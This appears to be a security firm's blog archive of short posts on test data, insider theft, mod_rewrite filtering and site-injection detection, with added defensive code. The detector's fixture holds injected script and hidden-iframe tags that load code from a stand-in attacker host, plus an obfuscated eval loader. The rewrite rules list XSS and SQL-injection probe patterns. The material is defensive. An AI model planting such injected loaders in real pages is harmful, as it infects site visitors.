From the category archives: Blog

Production Data in a Test Environment? Obfuscate or Generate

March 10, 2010

A recent article about database security and the use of production data in development and QA environments reports on a poll of 80 large financial industry organizations, which found that “83 percent use real data, such as credit card or account numbers, when developing and testing applications.”
PCI DSS Section 6.3.4, ISO/IEC 27002:2005 section 12.4.2, COBIT 4.0 AI3.3 [...]
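The two options in the title, obfuscate (mask) production rows or generate synthetic ones, can be shown side by side. The following is an added example written for this page, not code from the original post: it masks card numbers with an HMAC-derived, Luhn-valid replacement so the same real PAN always maps to the same fake PAN (joins between tables survive), replaces customer names with opaque tags, keeps non-identifying columns such as amounts, and pads the set with rows that have no production basis at all. The sample rows are constructed test numbers, the masking key, the `9999` prefix and the column names are assumptions for the example.

```python
import hashlib
import hmac
import random

# Constructed sample of "production" rows. The PANs are the well-known test
# numbers, not real accounts; the same card appears twice on purpose.
PRODUCTION_ROWS = [
    {"customer": "Alice Example", "pan": "4111111111111111", "amount": 42.50},
    {"customer": "Bob Example", "pan": "5500000000000004", "amount": 7.99},
    {"customer": "Alice Example", "pan": "4111111111111111", "amount": 13.00},
]

# Hypothetical masking key: generated fresh for each test-data refresh and
# kept in the production masking job only, never shipped with the test data.
MASKING_KEY = b"rotate-me-per-refresh"

# Prefix chosen so masked numbers cannot collide with a real issuer range
# (assumption for this example: 9 is not assigned to any card scheme).
SYNTHETIC_PREFIX = "9999"


def luhn_check_digit(partial: str) -> str:
    """Return the Luhn check digit for the digit string `partial`."""
    total = 0
    # The rightmost digit of `partial` is doubled because the check digit
    # will be appended to its right.
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(pan: str) -> bool:
    return pan.isdigit() and len(pan) > 1 and luhn_check_digit(pan[:-1]) == pan[-1]


def mask_pan(pan: str, key: bytes = MASKING_KEY) -> str:
    """Replace a real PAN with a deterministic, Luhn-valid synthetic one.

    Same input and key give the same output, so foreign-key relations
    between tables still line up. Length is preserved so column widths and
    format checks in the application keep passing.
    """
    digest = hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()
    body_len = len(pan) - len(SYNTHETIC_PREFIX) - 1
    # Map hex characters onto digits (slightly biased, which is fine for test
    # data); 64 hex chars cover any PAN length.
    digits = "".join(str(int(c, 16) % 10) for c in digest)[:body_len]
    partial = SYNTHETIC_PREFIX + digits
    return partial + luhn_check_digit(partial)


def mask_row(row: dict, key: bytes = MASKING_KEY) -> dict:
    """Mask the identifying columns, keep the analytic ones intact."""
    tag = hmac.new(key, row["customer"].encode(), hashlib.sha256).hexdigest()[:8]
    return {
        "customer": f"Customer-{tag}",
        "pan": mask_pan(row["pan"], key),
        "amount": row["amount"],
    }


def generate_row(rng: random.Random) -> dict:
    """The other option: a row with no production basis at all."""
    body = "".join(str(rng.randrange(10)) for _ in range(11))
    partial = SYNTHETIC_PREFIX + body
    return {
        "customer": f"Customer-{rng.randrange(10**6):06d}",
        "pan": partial + luhn_check_digit(partial),
        "amount": round(rng.uniform(1, 500), 2),
    }


def build_test_dataset(rows, key: bytes = MASKING_KEY, extra: int = 2, seed: int = 1) -> list:
    """Masked production rows followed by `extra` purely generated rows."""
    rng = random.Random(seed)
    return [mask_row(r, key) for r in rows] + [generate_row(rng) for _ in range(extra)]


if __name__ == "__main__":
    for r in build_test_dataset(PRODUCTION_ROWS):
        print(r)
```

Two caveats a practitioner would add: the masking key is itself sensitive, because anyone holding it can confirm whether a guessed PAN is present in the test set, so it stays with the production-side masking job; and fields that have no business being in test data at all (CVV, PIN blocks, track data) should be dropped rather than masked.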


Microsoft makes its four core SDL Training classes available to the public

March 1, 2010

Microsoft makes its four core SDL Training classes available to the public: Introduction to the Microsoft Security Development Lifecycle (SDL); Introduction to Microsoft Threat Modeling; Basics of Secure Design, Development, and Test; Privacy for Software Development.
You can download all the SDL materials and accompanying tools from the Microsoft site.
Tools are categorized by phase of the [...]


PCI-DSS Compliance and Third Party Custom Application Vendors

August 22, 2009

We have been performing many interesting PCI DSS compliance projects recently, assisting organizations in identifying their security and compliance gaps, creating remediation project plans, and assisting in communication with the acquiring banks that process their credit card transactions, often ghost-writing correspondence.
One of the most interesting things to come up recently has been the response from [...]


Insider Threat: AMEX DBA steals Credit Card data

July 8, 2009

A DBA at American Express in Phoenix used his access to steal credit card numbers and PINs, encoded the card numbers onto blank cards, and used them to make purchases.
AMEX was hit by a long-standing database security management problem – how do you log the DBA’s activities, when the logs are stored in tables the [...]
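The problem the post names, logging the DBA's activity into tables the DBA can edit, is one that a hash-chained audit log with an out-of-band anchor addresses: each audit row commits to the previous row's hash, and the latest hash is forwarded to a host the DBA has no rights on, so a row that is edited, deleted or dropped from the tail no longer verifies. This is an added example written for this page, not code from the original post or from American Express. The audit events, the SQLite table and the `offsite_heads` list standing in for a remote log collector are all constructed assumptions.

```python
import hashlib
import json
import sqlite3

# Constructed sample of statements the audit facility recorded. In practice
# these come from the database's own audit plugin, triggers or a proxy.
SAMPLE_EVENTS = [
    {"user": "dba1", "stmt": "SELECT pan FROM cards WHERE id = 42"},
    {"user": "dba1", "stmt": "SELECT pan, pin_block FROM cards"},
    {"user": "app", "stmt": "INSERT INTO orders VALUES (...)"},
]

GENESIS = "0" * 64  # hash "before" the first row


def entry_hash(prev_hash: str, seq: int, event: dict) -> str:
    """Hash of one audit row, bound to its predecessor and its sequence number."""
    payload = json.dumps({"prev": prev_hash, "seq": seq, "event": event}, sort_keys=True)
    return hashlib.sha256(payload.encode()).hexdigest()


class AuditStore:
    """An audit table the DBA can reach, plus an out-of-band copy of the chain head.

    `offsite_heads` stands in for a log host the DBA cannot write to
    (assumption for this example, e.g. a remote syslog collector).
    """

    def __init__(self):
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE audit (seq INTEGER PRIMARY KEY, event TEXT, hash TEXT)")
        self.offsite_heads = []  # (seq, hash) forwarded as each row is written

    def append(self, event: dict) -> str:
        row = self.db.execute("SELECT seq, hash FROM audit ORDER BY seq DESC LIMIT 1").fetchone()
        seq, prev = (row[0] + 1, row[1]) if row else (1, GENESIS)
        h = entry_hash(prev, seq, event)
        self.db.execute("INSERT INTO audit VALUES (?, ?, ?)",
                        (seq, json.dumps(event, sort_keys=True), h))
        self.db.commit()
        self.offsite_heads.append((seq, h))
        return h

    def verify(self) -> tuple:
        """Recompute the chain from the table and compare with the offsite head."""
        prev, expected_seq = GENESIS, 1
        for seq, event_json, h in self.db.execute("SELECT seq, event, hash FROM audit ORDER BY seq"):
            if seq != expected_seq:
                return False, f"gap before seq {seq}: row(s) deleted"
            if entry_hash(prev, seq, json.loads(event_json)) != h:
                return False, f"seq {seq}: row modified"
            prev, expected_seq = h, seq + 1
        off_seq, off_hash = self.offsite_heads[-1] if self.offsite_heads else (0, GENESIS)
        if expected_seq - 1 != off_seq or prev != off_hash:
            return False, f"chain head mismatch: table ends at seq {expected_seq - 1}, offsite head is seq {off_seq}"
        return True, "chain intact"


def tamper_demo() -> dict:
    """What each kind of direct edit by the DBA looks like to verify()."""
    edits = {
        "untouched": None,
        "modify_row": ("UPDATE audit SET event = ? WHERE seq = 2",
                       (json.dumps({"user": "app", "stmt": "SELECT 1"}, sort_keys=True),)),
        "delete_middle": ("DELETE FROM audit WHERE seq = 2", ()),
        "delete_last": ("DELETE FROM audit WHERE seq = 3", ()),
    }
    results = {}
    for name, sql in edits.items():
        store = AuditStore()
        for event in SAMPLE_EVENTS:
            store.append(event)
        if sql:
            store.db.execute(sql[0], sql[1])  # the DBA's direct edit, bypassing append()
            store.db.commit()
        results[name] = store.verify()
    return results


if __name__ == "__main__":
    for name, (ok, why) in tamper_demo().items():
        print(f"{name:14s} ok={ok} {why}")
```

The chain only proves tampering after the fact; it does not stop the DBA from reading the data, which is why the forwarding to the external host has to happen at write time and not from a nightly job the same DBA can disable.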


Rumors of new OpenSSH exploit in the wild, for older versions

July 8, 2009

http://www.theregister.co.uk/2009/07/08/openssh_exploit_rumour/
http://secer.org/hacktools/0day-openssh-remote-exploit.html
We first heard these rumors a couple of days ago, but sat on them because there was no evidence at the time, and no one is served by the release of fake exploit reports.
The very latest versions of OpenSSH are apparently immune – this makes us think of a few possibilities:

Denial of Service condition from years [...]


Cyber Warfare Trends for 2010: Network Attacks are the 21st Century’s Longbow

July 8, 2009

In the history of warfare, the ability to deliver powerful attacks from a distance has often been the deciding factor in conflicts. The prehistoric spear thrower begat the javelin, spear, longbow, cannon, rifle, intercontinental ballistic missile, and most recently… the remote exploit.
Reuters reports:
SEOUL (Reuters) – South Korean authorities issued a cyber security warning on Wednesday [...]


Poor Man’s Web Application Firewall (WAF) with Apache mod_rewrite

July 3, 2009

mod_rewrite can be used to protect against many types of XSS, XSRF, injection, HTTP verb abuse, referer link spam, image hijacking, and other things.
Here are a few articles with samples and examples of ways to use Apache mod_rewrite and .htaccess files to protect yourself.
http://perishablepress.com/press/2009/02/03/eight-ways-to-blacklist-with-apaches-mod_rewrite/
http://www.askapache.com/htaccess/mod_rewrite-tips-and-tricks.htm
http://www.askapache.com/htaccess/mod_rewrite-variables-cheatsheet.html
Of course there is always mod_security in addition to a range of [...]
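As an added example for this page (not code from the original post or from the linked articles), here is a minimal rule set covering each of the categories the post lists: verb restriction, XSS and injection probes in the query string, traversal, a crude XSRF check, referer spam and image hotlinking. `example.com`, the protected paths and the spam words are placeholders to adapt.

```apache
# Goes in .htaccess (needs AllowOverride FileInfo) or in a <Directory> block.
RewriteEngine On

# HTTP verb abuse: refuse anything but the verbs the application uses.
RewriteCond %{REQUEST_METHOD} !^(GET|HEAD|POST)$
RewriteRule .* - [F,L]

# XSS probes in the query string. QUERY_STRING is matched undecoded, so the
# raw and the %-encoded forms are both listed.
RewriteCond %{QUERY_STRING} (<|%3C)[^>]*script [NC,OR]
RewriteCond %{QUERY_STRING} (javascript|vbscript): [NC,OR]
RewriteCond %{QUERY_STRING} on(load|error|mouseover)\s*= [NC]
RewriteRule .* - [F,L]

# SQL injection probes: keyword pairs rather than single words, to limit
# false positives on ordinary search terms.
RewriteCond %{QUERY_STRING} union.{0,20}select [NC,OR]
RewriteCond %{QUERY_STRING} (select|insert|update|delete).{0,20}(from|into|table|set) [NC,OR]
RewriteCond %{QUERY_STRING} (drop|alter).{0,20}table [NC,OR]
RewriteCond %{QUERY_STRING} (;|%3B)\s*(shutdown|exec|xp_) [NC]
RewriteRule .* - [F,L]

# Directory traversal, checked on the raw request line and the query string.
RewriteCond %{THE_REQUEST} (\.\./|%2e%2e%2f) [NC,OR]
RewriteCond %{QUERY_STRING} (\.\./|%2e%2e%2f) [NC]
RewriteRule .* - [F,L]

# Crude XSRF check: POSTs to state-changing paths must come from our own
# pages. Clients that strip Referer will be refused, so keep the path list
# narrow.
RewriteCond %{REQUEST_METHOD} ^POST$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule ^(account|checkout|admin)/ - [F,L]

# Referer link spam.
RewriteCond %{HTTP_REFERER} (casino|viagra|poker) [NC]
RewriteRule .* - [F,L]

# Image hijacking (hotlinking): allow an empty Referer for direct visits and
# proxies, otherwise only our own site may embed our images.
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F,NC,L]
```

Treat rules like these as a speed bump, not a WAF: they are bypassed by double encoding, UTF-8 variants and case tricks, and the injection patterns will occasionally block legitimate input. Run them against a few days of real access logs before returning 403s in production, and reach for mod_security with a maintained rule set when the application warrants it.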


TorrentReactor Breach Used To Attack Users, Tip: How To Detect You’ve Been Hacked

July 3, 2009

In a nutshell: a recent trend in botnet/malware herder attacks is that they are looking for new, and old, ways to accomplish their main purpose, getting JavaScript malware onto legitimate sites, often using traditional hacking methods.
Emphasis in the quote below is mine. Similar to the reports of FTP hacking recently, where attackers [...]
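Since the injected code lands in files on the web server, the detection the title promises comes down to two checks: has anything in the document root changed since a known-good baseline, and do the pages now carry script or iframe tags that the site never had? The following is an added example written for this page, not code from the original post or from TorrentReactor. The clean and compromised pages are constructed in-line, the allowed script hosts are an assumption, and a real run would walk the document root with `os.walk` and keep the baseline somewhere an attacker holding the site's FTP credentials cannot rewrite it.

```python
import hashlib
import re

# Constructed sample: the site as it should be, and the same site after an
# attacker with FTP credentials appended a loader, a 1x1 iframe and a new page.
CLEAN_SITE = {
    "index.html": '<html><body><h1>Torrents</h1><script src="/js/site.js"></script></body></html>',
    "about.html": "<html><body><p>About us</p></body></html>",
}
COMPROMISED_SITE = {
    "index.html": CLEAN_SITE["index.html"]
    + '<script src="http://evil.example/js/loader.js"></script>',
    "about.html": CLEAN_SITE["about.html"].replace(
        "</body>",
        '<iframe src="http://evil.example/x.php" width="1" height="1" style="visibility:hidden"></iframe></body>'),
    "contact.html": '<html><body><script>eval(unescape("%64%6f%63%75%6d%65%6e%74"));</script></body></html>',
}

# Hosts the site legitimately loads scripts from (assumption for this example).
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "ajax.googleapis.com"}

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']?([^"\'\s>]+)', re.I)
IFRAME = re.compile(r"<iframe[^>]*>", re.I)
OBFUSCATION = re.compile(r"(eval|document\.write)\s*\(\s*unescape\s*\(", re.I)
HOST = re.compile(r"^(?:https?:)?//([^/:]+)", re.I)


def baseline(site: dict) -> dict:
    """Hash every file while the site is known to be clean."""
    return {path: hashlib.sha256(html.encode()).hexdigest() for path, html in site.items()}


def scan_content(path: str, html: str) -> list:
    """Content checks that work even without a baseline."""
    findings = []
    for src in SCRIPT_SRC.findall(html):
        m = HOST.match(src)  # relative paths have no host and are skipped
        if m and m.group(1).lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append((path, "external script", src))
    for tag in IFRAME.findall(html):
        low = tag.lower()
        if 'width="1"' in low or 'height="1"' in low or "hidden" in low or "display:none" in low:
            findings.append((path, "hidden iframe", tag))
    m = OBFUSCATION.search(html)
    if m:
        findings.append((path, "obfuscated inline script", m.group(0)))
    return findings


def scan_site(site: dict, known_hashes: dict) -> list:
    """Integrity check against the baseline plus the content checks."""
    findings = []
    for path, html in site.items():
        digest = hashlib.sha256(html.encode()).hexdigest()
        if path not in known_hashes:
            findings.append((path, "new file", ""))
        elif known_hashes[path] != digest:
            findings.append((path, "modified since baseline", ""))
        findings.extend(scan_content(path, html))
    for path in known_hashes.keys() - site.keys():
        findings.append((path, "missing file", ""))
    return findings


if __name__ == "__main__":
    known = baseline(CLEAN_SITE)
    for finding in scan_site(COMPROMISED_SITE, known):
        print(finding)
```

The baseline check catches everything, including injections the pattern list does not know about, but only if the hashes were taken before the compromise and stored off the box; the content checks are the fallback when no trustworthy baseline exists.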


Follow QuietMove on Twitter

July 2, 2009

We’re now posting the freshest, most relevant Information Security news to Twitter.
If you follow the “Security twit” hashtags #infosec, #security, #hack, #pci, #pcidss, and #webappsec, no doubt you’ve seen some of our posting.
Follow us, and we’ll follow you back!
http://twitter.com/quietmove


Web App Security: Comparing and contrasting Black Box, White Box, Fault Injection, and SCA

June 13, 2007

This article is based on a talk I gave at the Phoenix OWASP chapter on May 10th. My intention is to summarize the methods used to assess the security of web applications, identify what they are good and not so good at finding, and outline their varying strengths and weaknesses. If you’ll indulge me, I’d [...]
